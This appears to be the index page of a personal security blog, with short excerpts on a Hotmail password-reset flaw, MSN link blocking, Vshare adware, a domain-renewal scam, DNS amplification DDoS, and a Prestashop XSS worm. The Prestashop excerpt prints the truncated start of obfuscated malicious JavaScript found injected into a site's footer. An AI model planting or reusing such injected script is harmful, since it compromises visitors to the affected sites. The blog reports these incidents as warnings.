geek notes for advice seekers


Hotmail security hole plugged silently, no communication, no customer service

A vulnerability in the Hotmail password reset pages, that allowed hackers to get access to ANY hotmail/MSN account, has been widely exploited over the past week. I found a video on Youtube dated April 12, which describes the security hole, which is trivial and only needs the modification of 1 email field during a request […]

, , , , links blocked in MSN Messenger

UPDATE 28/03/2012: TheRegister has published an article about it and it seems MS decided to unban thepiratebay! ——– Looks like links are blocked in MSN messenger, anybody who tries to send a link, even of the homepage, receives back an error: I’d be curious to know if it has been mistakenly categorized as […]

, , , ,

Vshare / Widdit / Adware

Vshare plugin *IS* an adware. Whether you are on Mac, Windows or Linux this is the same, and you don’t even need the toolbar, only the plugin. I’ve installed the old version of the Vshare plugin on my Firefox, on Linux, (old version because the newest isn’t available on Linux) then some popups started to […]

, , , , , ,

Prestashop XSS Worm (footer.tpl virus)

Today i woke up and connected to a Prestashop site i’m setting up. I didn’t install anything extra on it (only my custom template), also it wasn’t in search engines. I noticed a strange blank line in the footer.. DOH! When i looked, i had this code in the footer: <script>String.prototype.asd=function(){return String.fromCharCode;}; Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘as’))throw 1;} […]

, , , , ,

The domainrenewal ( scam

OK this is already everywhere on internet for years, but i really had to write a post about it as these guys are spamming my mailbox every year. This company is trying to convince people into believing they need to renew (and obviously transfer) their domain names with them. Their paper looks very professional, and […]

, , , , ,

New DDoS attacks exploit recursive DNS Servers

Looks like some people are exploiting recursive DNS servers to conduct DDoS attacks. How? Simple: Some spoofed DNS requests appear to be sent from a victim host, they usually request for “.” (the root zone as it has a long answer) or a specific domain, if the DNS server is badly configured it will send […]